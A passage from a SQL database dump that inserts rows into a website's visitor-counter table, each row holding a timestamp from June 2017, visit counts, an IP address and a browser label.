6.15.156','other'),(123349,1497892613,1,1,0,0,'207.46.13.29','other'),(123350,1497893223,2,2,0,0,'91.209.11.236','other'),(123351,1497894273,1,1,0,0,'91.196.178.161','chrome'),(123352,1497894947,1,1,0,0,'217.182.132.148','other'),(123353,1497895065,1,1,0,0,'164.132.161.64','other'),(123354,1497895169,1,1,0,0,'40.77.167.109','other'),(123355,1497895582,1,1,0,0,'164.132.162.160','other'),(123356,1497895789,1,1,0,0,'164.132.162.153','other'),(123357,1497896236,1,1,0,0,'8.29.198.27','other'),(123358,1497896519,1,1,0,0,'91.209.11.236','other'),(123359,1497896544,1,1,0,0,'51.255.65.2','other'),(123360,1497896581,1,1,0,0,'217.182.132.32','other'),(123361,1497896615,1,1,0,0,'23.20.242.166','other'),(123362,1497897051,1,1,0,0,'5.165.44.113','msie'),(123363,1497898040,1,1,0,0,'51.255.65.37','other'),(123364,1497898112,1,1,0,0,'51.255.65.60','other'),(123365,1497898155,1,0,1,0,'66.249.66.157',''),(123366,1497898210,1,0,1,0,'68.180.230.48',''),(123367,1497898398,1,1,0,0,'51.255.65.57','other'),(123368,1497898956,1,1,0,0,'164.132.161.75','other'),(123369,1497899062,2,2,0,0,'46.229.168.69','other'),(123370,1497899079,2,2,0,0,'46.229.168.65','other'),(123371,1497899100,1,1,0,0,'46.229.168.71','other'),(123372,1497899118,3,3,0,0,'46.229.168.68','other'),(123373,1497899135,2,2,0,0,'46.229.168.73','other'),(123374,1497899189,3,3,0,0,'46.229.168.72','other'),(123375,1497899218,3,3,0,0,'46.229.168.66','other'),(123376,1497899225,5,5,0,0,'46.229.168.70','other'),(123377,1497899297,3,3,0,0,'46.229.168.79','other'),(123378,1497899315,1,1,0,0,'46.229.168.80','other'),(123379,1497899351,2,2,0,0,'46.229.168.76','other'),(123380,1497899424,1,1,0,0,'46.229.168.67','other'),(123381,1497899450,1,0,1,0,'66.249.76.112',''),(123382,1497899452,1,1,0,0,'46.229.168.77','other'),(123383,1497899460,1,1,0,0,'46.229.168.75','other'),(123384,1497899506,1,1,0,0,'51.255.65.10','other'),(123385,1497899750,1,1,0,0,'217.182.132.65','other'),(123386,1497899926,1,1,0,0,'51.255.65.29','other'),(123387,1497900339,1,1,0,0,'164.132.161.96','other'),(123388,1497901305,4,4,0,0,'141.8.142.152','other'),(123389,1497901358,8,8,0,0,'178.154.200.42','other'),(123390,1497901397,5,5,0,0,'5.255.253.54','other'),(123391,1497901574,1,1,0,0,'137.74.207.159','other'),(123392,1497901649,1,1,0,0,'51.255.65.15','other'),(123393,1497901689,5,5,0,0,'37.9.113.11','other'),(123394,1497901746,3,3,0,0,'141.8.132.47','other'),(123395,1497901990,1,1,0,0,'91.196.178.37','chrome'),(123396,1497902086,3,3,0,0,'141.8.142.134','other'),(123397,1497902211,1,1,0,0,'5.255.253.23','other'),(123398,1497902850,1,1,0,0,'141.8.142.152','other'),(123399,1497902990,1,0,1,0,'66.249.76.114',''),(123400,1497903230,3,3,0,0,'141.8.132.47','other'),(123401,1497903321,1,1,0,0,'23.20.242.166','other'),(123402,1497903417,1,0,1,0,'66.249.76.112',''),(123403,1497903617,1,1,0,0,'5.255.253.54','other'),(123404,1497903913,1,1,0,0,'164.132.161.16','other'),(123405,1497904336,1,1,0,0,'207.46.13.29','other'),(123406,1497904759,1,1,0,0,'141.8.132.47','other'),(123407,1497904943,2,2,0,0,'141.8.142.134','other'),(123408,1497905206,3,3,0,0,'141.8.132.49','other'),(123409,1497905377,3,3,0,0,'141.8.142.152','other'),(123410,1497905659,1,1,0,0,'164.132.162.154','other'),(123411,1497905716,1,1,0,0,'66.249.76.137','chrome'),(123412,1497905831,1,1,0,0,'5.255.253.27','other'),(123413,1497905914,3,3,0,0,'5.255.253.54','other'),(123414,1497906129,3,3,0,0,'141.8.142.134','other'),(123415,1497906162,2,2,0,0,'178.154.200.42','other'),(123416,1497906396,2,2,0,0,'5.255.253.23','other'),(123417,1497906561,1,1,0,0,'141.8.142.152','other'),(123418,1497906718,1,1,0,0,'37.9.113.11','other'),(123419,1497906753,1,1,0,0,'5.255.253.75','other'),(123420,1497906946,4,4,0,0,'141.8.132.47','other'),(123421,1497906988,1,1,0,0,'66.249.76.114','chrome'),(123422,1497907083,1,1,0,0,'8.29.198.27','other'),(123423,1497907229,1,1,0,0,'141.8.142.134','other'),(123424,1497907287,1,1,0,0,'95.108.213.25','other'),(123425,1497907297,1,1,0,0,'95.108.181.27','other'),(123426,1497907309,4,4,0,0,'5.255.253.54','other'),(123427,1497907313,1,1,0,0,'5.255.253.23','other'),(123428,1497907352,1,1,0,0,'178.154.200.42','other'),(123429,1497907818,1,1,0,0,'91.209.11.236','other'),(123431,1497907897,1,1,0,0,'54.165.59.7','other'),(123432,1497908064,1,1,0,0,'164.132.161.33','other'),(123433,1497908168,1,1,0,0,'164.132.161.22','other'),(123434,1497908225,1,1,0,0,'5.255.253.54','other'),(123435,1497908267,1,1,0,0,'141.8.132.47','other'),(123436,1497908648,1,0,1,0,'66.249.66.75',''),(123437,1497908782,1,1,0,0,'37.53.228.148','chrome'),(123438,1497908816,3,3,0,0,'54.165.59.7','other'),(123439,1497908911,1,1,0,0,'164.132.161.27','other'),(123440,1497909436,1,1,0,0,'180.76.15.153','other'),(123441,1497909605,1,1,0,0,'178.154.200.12','other'),(123442,1497910002,1,0,1,0,'66.249.76.131',''),(123443,1497910101,1,1,0,0,'51.255.65.52','other'),(123444,1497910334,2,2,0,0,'54.165.59.7','other'),(123445,1497910362,1,1,0,0,'66.249.76.114','chrome'),(123446,1497910634,1,1,0,0,'51.255.65.8','other'),(123447,1497910771,1,1,0,0,'217.182.132.79','other'),(123448,1497910880,1,1,0,0,'216.244.66.237','other'),(123449,1497910916,1,1,0,0,'207.46.13.149','other'),(123450,1497910948,1,1,0,0,'51.255.65.58','other'),(123451,1497911332,2,2,0,0,'178.154.200.42','other'),(123452,1497911415,1,1,0,0,'23.20.242.166','other'),(123453,1497911446,1,1,0,0,'37.9.113.11','other'),(123454,1497911447,1,1,0,0,'217.182.132.178','other'),(123455,1497911690,2,2,0,0,'5.255.253.54','other'),(123456,1497912012,1,1,0,0,'141.8.142.152','other'),(123457,1497912451,2,2,0,0,'141.8.142.134','other'),(123458,1497912804,1,0,1,0,'66.249.76.131',''),(123459,1497912997,1,1,0,0,'5.255.253.23','other'),(123460,1497913232,1,1,0,0,'178.154.200.42','other'),(123461,1497913271,1,1,0,0,'37.9.113.11','other'),(123462,1497913533,1,1,0,0,'141.8.132.47','other'),(123463,1497913575,1,1,0,0,'5.255.253.54','other'),(123464,1497913999,1,1,0,0,'141.8.142.152','other'),(123465,1497914001,1,1,0,0,'217.182.132.55','other'),(123466,1497914601,1,1,0,0,'164.132.161.44','other'),(123467,1497914728,1,1,0,0,'5.255.253.54','other'),(123468,1497914783,3,3,0,0,'54.165.59.7','other'),(123469,1497915052,2,2,0,0,'141.8.142.152','other'),(123470,1497915351,1,1,0,0,'180.76.15.27','other'),(123471,1497915517,1,0,1,0,'68.180.230.48',''),(123472,1497915800,1,1,0,0,'164.132.161.67','other'),(123473,1497915826,1,1,0,0,'91.209.11.236','other'),(123474,1497916044,1,0,1,0,'66.249.66.74',''),(123475,1497916045,1,1,0,0,'23.20.242.166','other'),(123476,1497917024,1,1,0,0,'207.46.13.29','other'),(123477,1497917087,1,1,0,0,'217.182.132.77','other'),(123478,1497917137,1,1,0,0,'91.209.11.236','other'),(123479,1497917321,1,1,0,0,'51.255.66.102','other'),(123480,1497917494,1,1,0,0,'164.132.161.91','other'),(123481,1497917689,1,0,1,0,'66.249.76.114',''),(123482,1497917709,1,1,0,0,'51.255.65.87','other'),(123483,1497917915,1,1,0,0,'8.29.198.25','other'),(123484,1497917932,1,1,0,0,'51.255.71.129','other'),(123485,1497918305,1,1,0,0,'51.255.65.72','other'),(123486,1497918696,1,1,0,0,'164.132.161.49','other'),(123487,1497919008,1,0,1,0,'66.249.76.113',''),(123488,1497919450,1,1,0,0,'217.182.132.55','other'),(123489,1497919826,1,1,0,0,'51.255.65.52','other'),(123490,1497920110,1,1,0,0,'51.255.71.129','other'),(123491,1497920347,1,1,0,0,'217.182.132.177','other'),(123492,1497920677,1,1,0,0,'66.249.76.114','chrome'),(123493,1497921204,1,1,0,0,'23.20.242.166','other'),(123494,1497921298,1,1,0,0,'217.182.132.31','other'),(123495,1497921383,1,1,0,0,'216.244.66.237','other'),(123496,1497921597,1,1,0,0,'51.255.71.123','other'),(123497,1497921804,1,0,1,0,'66.249.76.137',''),(123498,1497921987,1,1,0,0,'66.249.76.112','chrome'),(123499,1497922326,1,1,0,0,'51.255.65.64','other'),(123500,1497922436,1,1,0,0,'5.196.87.171','other'),(123501,1497922584,1,1,0,0,'164.132.161.44','other'),(123502,1497923639,2,2,0,0,'5.255.253.66','other'),(123503,1497923703,1,1,0,0,'164.132.162.157','other'),(123504,1497923734,1,1,0,0,'164.132.161.70','other'),(123505,1497923840,1,1,0,0,'66.249.76.114','chrome'),(123506,1497923865,1,1,0,0,'66.249.76.113','chrome'),(123507,1497923999,2,2,0,0,'178.154.200.70','other'),(123508,1497924477,1,0,1,0,'66.249.66.76',''),(123509,1497924663,1,1,0,0,'178.154.200.67','other'),(123510,1497924780,1,0,1,0,'66.249.66.156',''),(123511,1497924843,1,1,0,0,'5.255.253.27','other'),(123512,1497924950,1,1,0,0,'95.108.181.22','other'),(123513,1497925178,1,1,0,0,'5.255.253.66','other'),(123514,1497925324,1,1,0,0,'95.108.213.10','other'),(123515,1497925327,1,1,0,0,'37.9.113.15','other'),(123516,1497925358,1,1,0,0,'178.159.37.39','firefox'),(123517,1497925404,1,1,0,0,'141.8.142.142','other'),(123518,1497925460,3,3,0,0,'5.255.253.54','other'),(123519,1497925509,2,2,0,0,'141.8.142.152','other'),(123520,1497925529,1,1,0,0,'164.132.161.24','other'),(123521,1497925542,1,1,0,0,'141.8.132.47','other'),(123522,1497925722,2,2,0,0,'141.8.132.49','other'),(123523,1497925848,2,2,0,0,'37.9.113.11','other'),(123524,1497925898,1,1,0,0,'5.255.253.16','other'),(123525,1497925901,1,1,0,0,'5.255.253.45','other'),(123526,1497925955,1,1,0,0,'5.255.253.23','other'),(123527,1497926067,1,1,0,0,'66.249.76.114','chrome'),(123528,1497926068,1,1,0,0,'178.154.200.42','other'),(123529,1497926082,1,0,1,0,'66.249.66.74',''),(123530,1497926091,1,1,0,0,'95.108.181.27','other'),(123531,1497926116,1,1,0,0,'141.8.142.134','other'),(123532,1497926224,1,1,0,0,'95.108.181.11','other'),(123533,1497926230,1,1,0,0,'66.249.76.113','chrome'),(123534,1497926319,1,1,0,0,'141.8.142.129','other'),(123535,1497926322,1,1,0,0,'178.154.149.7','other'),(123536,1497926390,1,1,0,0,'178.154.189.10','other'),(123537,1497926431,1,1,0,0,'217.182.132.78','other'),(123538,1497926475,1,1,0,0,'95.108.213.25','other'),(123539,1497926507,1,1,0,0,'178.154.200.12','other'),(123540,1497927033,2,2,0,0,'141.8.142.152','other'),(123541,1497927122,1,1,0,0,'5.255.253.54','other'),(123542,1497927956,1,1,0,0,'217.182.132.88','other'),(123543,1497928485,1,0,1,0,'66.249.76.114',''),(123544,1497928720,1,0,1,0,'66.249.76.112',''),(123545,1497928757,1,1,0,0,'8.29.198.25','other'),(123546,1497928784,1,1,0,0,'51.255.65.22','other'),(123547,1497928896,1,1,0,0,'51.255.65.83','other'),(123548,1497929305,1,1,0,0,'141.8.142.152','other'),(123549,1497929418,1,1,0,0,'5.255.253.54','other'),(123550,1497929430,1,1,0,0,'217.182.132.60','other'),(123551,1497929743,1,1,0,0,'164.132.161.70','other'),(123552,1497929766,1,1,0,0,'95.28.55.14','msie'),(123553,1497929853,1,1,0,0,'164.132.161.21','other'),(123554,1497930007,1,1,0,0,'178.154.200.42','other'),(123555,1497930545,1,1,0,0,'51.255.71.117','other'),(123556,1497930968,1,1,0,0,'157.55.39.147','other'),(123557,1497930973,1,1,0,0,'217.182.132.32','other'),(123558,1497931251,1,1,0,0,'217.182.132.182','other'),(123559,1497931498,1,0,1,0,'66.249.76.137',''),(123560,1497931590,1,1,0,0,'164.132.161.37','other'),(123561,1497932144,1,1,0,0,'216.244.66.237','other'),(123562,1497932404,1,0,1,0,'66.249.76.137',''),(123563,1497932890,1,1,0,0,'46.48.13.161','chrome'),(123564,1497933163,1,1,0,0,'217.182.132.30','other'),(123565,1497934031,1,1,0,0,'51.255.71.117','other'),(123566,1497934051,1,0,1,0,'66.249.76.112',''),(123567,1497934082,1,1,0,0,'91.196.178.67','firefox'),(123568,1497934231,1,1,0,0,'66.249.76.131','chrome'),(123569,1497934292,1,1,0,0,'51.255.65.79','other'),(123570,1497934307,1,1,0,0,'66.249.66.155','chrome'),(123571,1497935105,1,1,0,0,'164.132.161.82','other'),(123572,1497935546,1,1,0,0,'217.182.132.33','other'),(123573,1497935639,1,1,0,0,'91.196.178.67','firefox'),(123574,1497935648,1,1,0,0,'51.255.71.126','other'),(123575,1497935797,1,1,0,0,'51.255.65.90','other'),(123576,1497936056,1,1,0,0,'37.54.23.137','chrome'),(123577,1497936088,1,1,0,0,'95.108.213.25','other'),(123578,1497936094,1,1,0,0,'5.255.253.46','other'),(123579,1497936110,1,1,0,0,'141.8.142.51','other'),(123580,1497936145,1,1,0,0,'95.108.213.3','other'),(123581,1497936148,1,1,0,0,'95.108.179.17','other'),(123582,1497936192,1,1,0,0,'141.8.142.129','other'),(123583,1497936262,1,1,0,0,'141.8.142.74','other'),(123584,1497936347,1,1,0,0,'141.8.142.152','other'),(123585,1497936565,1,1,0,0,'51.255.65.94','other'),(123586,1497936618,1,1,0,0,'109.173.60.190','chrome'),(123587,1497936697,1,1,0,0,'141.8.183.15','other'),(123588,1497936753,1,1,0,0,'95.108.181.11','other'),(123589,1497936849,1,1,0,0,'95.108.179.14','other'),(123590,1497936898,1,1,0,0,'5.255.253.23','other'),(123591,1497936983,1,1,0,0,'178.154.200.12','other'),(123592,1497936995,1,1,0,0,'37.54.23.137','chrome'),(123593,1497937047,1,1,0,0,'5.255.253.66','other'),(123594,1497937120,1,1,0,0,'178.154.200.42','other'),(123595,1497937160,2,2,0,0,'37.9.113.11','other'),(123596,1497937181,3,3,0,0,'141.8.142.134','other'),(123597,1497937186,1,1,0,0,'46.161.9.52','chrome'),(123598,1497937333,1,1,0,0,'178.95.247.243','firefox'),(123599,1497937422,1,1,0,0,'51.255.65.40','other'),(123600,1497937434,1,1,0,0,'141.8.132.47','other'),(123601,1497937524,2,2,0,0,'5.255.253.54','other'),(123602,1497937566,1,1,0,0,'40.77.167.105','other'),(123603,1497937634,1,0,1,0,'66.249.76.131',''),(123604,1497937675,1,1,0,0,'51.255.65.18','other'),(123605,1497937685,1,0,1,0,'66.249.66.74',''),(123606,1497937758,1,1,0,0,'91.196.178.104','opera'),(123607,1497937810,1,1,0,0,'137.74.201.100','other'),(123608,1497938423,1,1,0,0,'164.132.161.7','other'),(123609,1497938763,2,2,0,0,'37.9.113.11','other'),(123610,1497939110,1,1,0,0,'91.196.177.26','chrome'),(123611,1497939181,1,0,1,0,'66.249.76.113',''),(123612,1497939285,1,1,0,0,'141.8.132.49','other'),(123613,1497939405,1,1,0,0,'216.244.66.237','other'),(123614,1497939446,2,2,0,0,'91.196.178.104','chrome'),(123615,1497939447,1,1,0,0,'5.255.253.23','other'),(123616,1497939593,1,0,1,0,'66.249.76.131',''),(123617,1497939594,1,1,0,0,'8.29.198.25','other'),(123618,1497939601,1,1,0,0,'5.255.253.54','other'),(123619,1497939689,1,1,0,0,'178.154.200.42','other'),(123620,1497939756,1,1,0,0,'91.196.178.101','firefox'),(123621,1497939792,1,1,0,0,'164.132.161.19','other'),(123622,1497939813,1,1,0,0,'37.9.113.11','other'),(123623,1497940128,1,1,0,0,'217.182.132.192','other'),(123624,1497940167,2,2,0,0,'141.8.142.152','other'),(123625,1497940336,1,1,0,0,'178.95.247.243','firefox'),(123626,1497940449,1,1,0,0,'51.255.71.132','other'),(123627,1497940485,1,1,0,0,'164.132.162.157','other'),(123628,1497940529,1,1,0,0,'77.120.18.52','chrome'),(123629,1497940712,1,0,1,0,'66.249.76.131',''),(123630,1497940732,1,1,0,0,'91.196.178.68','chrome'),(123631,1497941167,1,1,0,0,'217.76.204.222','other'),(123632,1497941184,1,1,0,0,'31.13.114.81','other'),(123633,1497941190,1,1,0,0,'66.220.145.244','other'),(123634,1497941217,2,2,0,0,'31.13.114.48','other'),(123635,1497941240,1,1,0,0,'178.95.247.243','firefox'),(123636,1497941382,1,0,1,0,'68.180.231.23',''),(123637,1497942993,1,1,0,0,'217.182.132.241','other'),(123638,1497943060,2,2,0,0,'178.95.247.243','chrome'),(123639,1497943137,1,1,0,0,'51.255.65.33','other'),(123640,1497943143,1,1,0,0,'91.196.177.26','chrome'),(123641,1497943399,1,1,0,0,'178.95.247.243','firefox'),(123642,1497943532,1,1,0,0,'66.102.9.131','chrome'),(123643,1497943741,1,1,0,0,'92.112.21.38','firefox'),(123644,1497944152,1,1,0,0,'95.132.33.162','firefox'),(123645,1497944361,1,1,0,0,'217.182.132.241','other'),(123646,1497944468,1,1,0,0,'178.95.247.243','firefox');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (123647,1497944657,1,1,0,0,'217.182.132.153','other'),(123648,1497945225,1,1,0,0,'137.74.201.100','other'),(123649,1497945348,1,1,0,0,'207.46.13.28','other'),(123650,1497945627,1,1,0,0,'180.76.15.9','other'),(123651,1497945780,1,1,0,0,'217.182.132.75','other'),(123652,1497945892,1,1,0,0,'164.132.161.91','other'),(123653,1497946217,1,1,0,0,'217.182.132.177','other'),(123654,1497946327,1,0,1,0,'66.249.76.112',''),(123655,1497946631,1,1,0,0,'141.8.142.134','other'),(123656,1497946632,1,1,0,0,'164.132.161.59','other'),(123657,1497946640,1,1,0,0,'5.255.253.54','other'),(123658,1497947529,1,1,0,0,'128.68.216.167','chrome'),(123659,1497948069,1,0,1,0,'66.249.76.131',''),(123660,1497948084,1,1,0,0,'207.46.13.28','other'),(123661,1497948172,1,1,0,0,'66.249.66.75','chrome'),(123662,1497948415,1,1,0,0,'217.182.132.61','other'),(123663,1497949352,1,1,0,0,'46.33.47.65','chrome'),(123664,1497949382,1,1,0,0,'80.254.155.43','chrome'),(123665,1497949476,1,1,0,0,'91.196.178.169','chrome'),(123666,1497949529,1,1,0,0,'178.154.200.42','other'),(123667,1497949630,1,1,0,0,'51.255.71.110','other'),(123668,1497949683,1,1,0,0,'141.8.132.47','other'),(123669,1497949786,2,2,0,0,'207.46.13.149','other'),(123670,1497950120,1,1,0,0,'178.95.247.243','firefox'),(123671,1497950428,1,1,0,0,'8.29.198.27','other'),(123672,1497950883,1,1,0,0,'217.182.132.30','other'),(123673,1497950892,1,0,1,0,'66.249.76.114',''),(123674,1497950941,1,1,0,0,'37.73.223.159','chrome'),(123675,1497951058,1,1,0,0,'178.95.247.243','firefox'),(123676,1497951118,2,2,0,0,'95.134.203.101','chrome'),(123677,1497951265,1,0,1,0,'66.249.76.137',''),(123678,1497951353,1,0,1,0,'66.249.66.157',''),(123679,1497951461,1,1,0,0,'51.255.65.21','other'),(123680,1497951462,1,1,0,0,'194.54.160.8','chrome'),(123681,1497951997,1,1,0,0,'137.74.207.109','other'),(123682,1497952280,1,1,0,0,'51.255.71.118','other'),(123683,1497952394,1,1,0,0,'164.132.161.17','other'),(123684,1497952774,1,0,1,0,'66.249.76.112',''),(123685,1497953375,1,1,0,0,'37.57.8.114','chrome'),(123686,1497953561,1,1,0,0,'195.68.203.237','chrome'),(123687,1497953836,1,0,1,0,'68.180.230.48',''),(123688,1497953987,1,1,0,0,'216.244.66.237','other'),(123689,1497954365,1,1,0,0,'91.196.177.26','chrome'),(123690,1497954768,1,1,0,0,'217.182.132.81','other'),(123691,1497955188,1,1,0,0,'92.112.218.179','opera'),(123692,1497955323,1,0,1,0,'66.249.76.131',''),(123693,1497955812,1,1,0,0,'51.255.65.60','other'),(123694,1497955957,1,1,0,0,'51.255.65.88','other'),(123695,1497956059,1,1,0,0,'217.182.132.30','other'),(123696,1497956567,1,1,0,0,'51.255.65.74','other'),(123697,1497956580,1,0,1,0,'66.249.76.113',''),(123698,1497956702,1,1,0,0,'185.137.18.148','chrome'),(123699,1497956711,1,1,0,0,'141.8.142.152','other'),(123700,1497956855,1,1,0,0,'91.196.178.165','chrome'),(123701,1497957125,1,1,0,0,'51.255.65.17','other'),(123702,1497957314,1,1,0,0,'5.255.253.54','other'),(123703,1497957387,1,1,0,0,'66.249.76.114','chrome'),(123704,1497957447,1,1,0,0,'91.196.178.68','chrome'),(123705,1497957524,1,1,0,0,'217.182.132.6','other'),(123706,1497957698,1,0,1,0,'66.249.76.113',''),(123707,1497958129,1,1,0,0,'51.255.71.116','other'),(123708,1497958239,1,1,0,0,'51.255.65.59','other'),(123709,1497958343,1,1,0,0,'77.121.167.47','firefox'),(123710,1497958361,1,1,0,0,'91.196.178.68','chrome'),(123711,1497958596,1,1,0,0,'178.95.247.243','firefox'),(123712,1497958646,1,1,0,0,'91.196.178.134','firefox'),(123713,1497959085,1,1,0,0,'217.182.132.23','other'),(123714,1497959246,1,1,0,0,'51.255.65.21','other'),(123715,1497959586,1,1,0,0,'66.102.9.153','chrome'),(123716,1497959627,1,1,0,0,'91.196.178.34','chrome'),(123717,1497959791,1,1,0,0,'164.132.161.69','other'),(123718,1497960109,2,2,0,0,'54.165.59.7','other'),(123719,1497960130,1,1,0,0,'91.196.178.69','firefox'),(123720,1497960367,1,1,0,0,'164.132.161.2','other'),(123721,1497960486,1,1,0,0,'91.196.178.71','firefox'),(123722,1497960609,1,1,0,0,'164.132.161.20','other'),(123723,1497961040,1,1,0,0,'178.95.247.243','firefox'),(123724,1497961075,1,1,0,0,'216.244.66.237','other'),(123725,1497961277,1,1,0,0,'8.29.198.25','other'),(123726,1497961406,1,1,0,0,'91.196.179.138','firefox'),(123727,1497961467,1,1,0,0,'66.249.76.114','chrome'),(123728,1497961523,1,0,1,0,'66.249.66.76',''),(123729,1497963257,1,1,0,0,'217.182.132.35','other'),(123730,1497963442,1,1,0,0,'176.31.231.10','other'),(123731,1497963504,1,1,0,0,'217.182.132.57','other'),(123732,1497963887,1,1,0,0,'66.249.76.114','chrome'),(123733,1497963987,1,1,0,0,'178.95.247.243','firefox'),(123734,1497964291,1,0,1,0,'66.249.76.112',''),(123735,1497964428,1,1,0,0,'51.255.65.35','other'),(123736,1497965345,1,1,0,0,'195.10.210.49','chrome'),(123737,1497965444,1,1,0,0,'51.255.65.80','other'),(123738,1497965524,9,9,0,0,'46.4.88.247','other'),(123739,1497965818,1,1,0,0,'91.196.178.71','chrome'),(123740,1497965965,1,1,0,0,'51.255.65.77','other'),(123741,1497966724,1,1,0,0,'91.196.178.71','chrome'),(123742,1497966891,1,1,0,0,'31.148.29.2','chrome'),(123743,1497967324,2,2,0,0,'216.244.66.237','other'),(123744,1497967378,1,0,1,0,'66.249.76.137',''),(123745,1497968102,1,1,0,0,'95.28.206.98','msie'),(123746,1497968357,1,1,0,0,'51.255.65.31','other'),(123747,1497968570,1,1,0,0,'66.249.76.91','chrome'),(123748,1497968767,1,1,0,0,'217.182.132.71','other'),(123749,1497969185,1,1,0,0,'31.0.202.152','chrome'),(123750,1497970178,1,0,1,0,'66.249.66.156',''),(123751,1497970189,1,0,1,0,'66.249.76.107',''),(123752,1497971140,1,0,1,0,'68.180.230.48',''),(123753,1497971374,3,3,0,0,'91.209.11.236','other'),(123754,1497971596,1,1,0,0,'51.255.65.35','other'),(123755,1497971598,3,3,0,0,'178.154.200.42','other'),(123756,1497971655,1,1,0,0,'141.8.142.134','other'),(123757,1497971772,3,3,0,0,'5.255.253.54','other'),(123758,1497971935,5,5,0,0,'141.8.142.152','other'),(123759,1497971999,1,0,1,0,'66.249.76.89',''),(123760,1497972013,1,1,0,0,'217.182.132.97','other'),(123761,1497972111,1,1,0,0,'8.29.198.26','other'),(123762,1497972175,1,1,0,0,'5.255.253.23','other'),(123763,1497972205,1,1,0,0,'141.8.132.47','other'),(123764,1497972247,1,1,0,0,'164.132.161.56','other'),(123765,1497972403,1,1,0,0,'95.108.213.25','other'),(123766,1497972516,1,1,0,0,'178.154.200.27','other'),(123767,1497972673,1,1,0,0,'178.154.200.42','other'),(123768,1497972876,1,1,0,0,'91.211.132.44','chrome'),(123769,1497973046,2,2,0,0,'164.132.161.23','other'),(123770,1497973511,1,1,0,0,'5.255.253.27','other'),(123771,1497973923,1,1,0,0,'37.9.113.11','other'),(123772,1497973935,1,1,0,0,'164.132.161.35','other'),(123773,1497974013,1,1,0,0,'217.182.132.85','other'),(123774,1497974204,2,2,0,0,'91.196.178.133','chrome'),(123775,1497974231,1,1,0,0,'95.108.213.25','other'),(123776,1497974261,1,0,1,0,'66.249.76.109',''),(123777,1497974870,1,1,0,0,'157.55.39.122','other'),(123778,1497974982,1,1,0,0,'5.255.253.54','other'),(123779,1497975406,1,1,0,0,'217.182.132.31','other'),(123780,1497975876,1,1,0,0,'164.132.161.94','other'),(123781,1497976004,1,1,0,0,'51.255.71.132','other'),(123782,1497976113,1,1,0,0,'217.182.132.193','other'),(123783,1497976168,1,1,0,0,'164.132.161.93','other'),(123784,1497976348,1,1,0,0,'91.196.178.166','other'),(123785,1497976716,1,1,0,0,'46.211.66.88','chrome'),(123786,1497976768,1,1,0,0,'164.132.161.37','other'),(123787,1497976897,1,1,0,0,'51.255.71.121','other'),(123788,1497977462,1,1,0,0,'216.244.66.237','other'),(123789,1497977537,1,1,0,0,'51.255.65.85','other'),(123790,1497978148,1,1,0,0,'164.132.161.9','other'),(123791,1497978701,1,1,0,0,'137.74.207.108','other'),(123792,1497978730,1,1,0,0,'164.132.161.29','other'),(123793,1497979743,1,1,0,0,'164.132.161.3','other'),(123794,1497979789,1,1,0,0,'164.132.161.47','other'),(123795,1497979855,1,1,0,0,'217.182.132.74','other'),(123796,1497980815,1,1,0,0,'66.249.76.109','chrome'),(123797,1497980871,1,1,0,0,'216.244.66.237','other'),(123798,1497980913,1,1,0,0,'164.132.161.8','other'),(123799,1497981107,1,1,0,0,'164.132.161.23','other'),(123800,1497981513,1,1,0,0,'164.132.161.62','other'),(123801,1497982218,1,1,0,0,'51.255.65.19','other'),(123802,1497982438,1,1,0,0,'217.182.132.179','other'),(123803,1497982644,1,1,0,0,'217.182.132.82','other'),(123804,1497982882,1,1,0,0,'217.182.132.80','other'),(123805,1497982944,1,1,0,0,'8.29.198.27','other'),(123806,1497983190,1,1,0,0,'51.255.65.21','other'),(123807,1497983651,1,1,0,0,'180.76.15.139','other'),(123808,1497983653,1,1,0,0,'180.76.15.16','other'),(123809,1497983667,1,1,0,0,'176.8.141.224','chrome'),(123810,1497983753,1,1,0,0,'40.77.167.122','other'),(123811,1497983831,1,1,0,0,'51.255.65.5','other'),(123812,1497984100,1,1,0,0,'217.182.132.54','other'),(123813,1497984140,1,1,0,0,'51.255.65.61','other'),(123814,1497984195,1,1,0,0,'46.161.9.55','chrome'),(123815,1497984457,1,0,1,0,'66.249.66.157',''),(123816,1497984490,1,1,0,0,'217.182.132.75','other'),(123817,1497984630,1,1,0,0,'164.132.161.84','other'),(123818,1497984681,1,1,0,0,'51.255.65.21','other'),(123819,1497984838,1,1,0,0,'217.182.132.29','other'),(123820,1497985025,1,1,0,0,'95.108.213.25','other'),(123821,1497985032,1,1,0,0,'87.250.224.21','other'),(123822,1497985132,1,1,0,0,'51.255.65.71','other'),(123823,1497985247,2,2,0,0,'141.8.132.47','other'),(123824,1497985482,5,5,0,0,'178.154.200.42','other'),(123825,1497985675,1,1,0,0,'93.74.212.147','firefox'),(123826,1497985919,5,5,0,0,'5.255.253.54','other'),(123827,1497986054,2,2,0,0,'141.8.142.152','other'),(123828,1497986389,5,5,0,0,'141.8.132.47','other'),(123829,1497986503,1,1,0,0,'164.132.161.17','other'),(123830,1497986624,1,1,0,0,'141.8.142.142','other'),(123831,1497986870,5,5,0,0,'5.255.253.54','other'),(123832,1497986880,1,1,0,0,'5.255.253.23','other'),(123833,1497986889,1,1,0,0,'37.9.113.11','other'),(123834,1497987011,1,1,0,0,'51.255.65.76','other'),(123835,1497987033,1,1,0,0,'141.8.142.152','other'),(123836,1497987147,1,1,0,0,'95.132.113.45','firefox'),(123837,1497987335,6,6,0,0,'141.8.132.47','other'),(123838,1497987442,1,1,0,0,'178.154.200.42','other'),(123839,1497987796,1,1,0,0,'5.255.253.54','other'),(123840,1497987893,1,1,0,0,'141.8.132.37','other'),(123841,1497988090,1,1,0,0,'51.255.65.95','other'),(123842,1497988178,1,1,0,0,'164.132.161.26','other'),(123843,1497988367,1,1,0,0,'217.182.132.33','other'),(123844,1497988929,1,1,0,0,'164.132.161.16','other'),(123845,1497989122,2,2,0,0,'5.255.253.54','other'),(123846,1497989125,1,1,0,0,'5.255.253.33','other'),(123847,1497989412,1,1,0,0,'51.255.65.52','other'),(123848,1497989545,2,2,0,0,'178.154.200.42','other'),(123849,1497990075,1,1,0,0,'141.8.142.152','other'),(123850,1497990230,1,1,0,0,'217.182.132.193','other'),(123851,1497990389,1,1,0,0,'51.255.65.95','other'),(123852,1497990484,1,1,0,0,'164.132.162.159','other'),(123853,1497990553,2,2,0,0,'178.154.200.42','other'),(123854,1497990577,2,2,0,0,'5.255.253.54','other'),(123855,1497990618,2,2,0,0,'141.8.132.47','other'),(123856,1497990701,1,1,0,0,'141.8.142.134','other'),(123857,1497990705,1,1,0,0,'5.255.253.16','other'),(123858,1497991348,1,0,1,0,'66.249.76.107',''),(123859,1497991423,2,2,0,0,'37.9.113.11','other'),(123860,1497991540,2,2,0,0,'5.255.253.54','other'),(123861,1497991613,2,2,0,0,'141.8.142.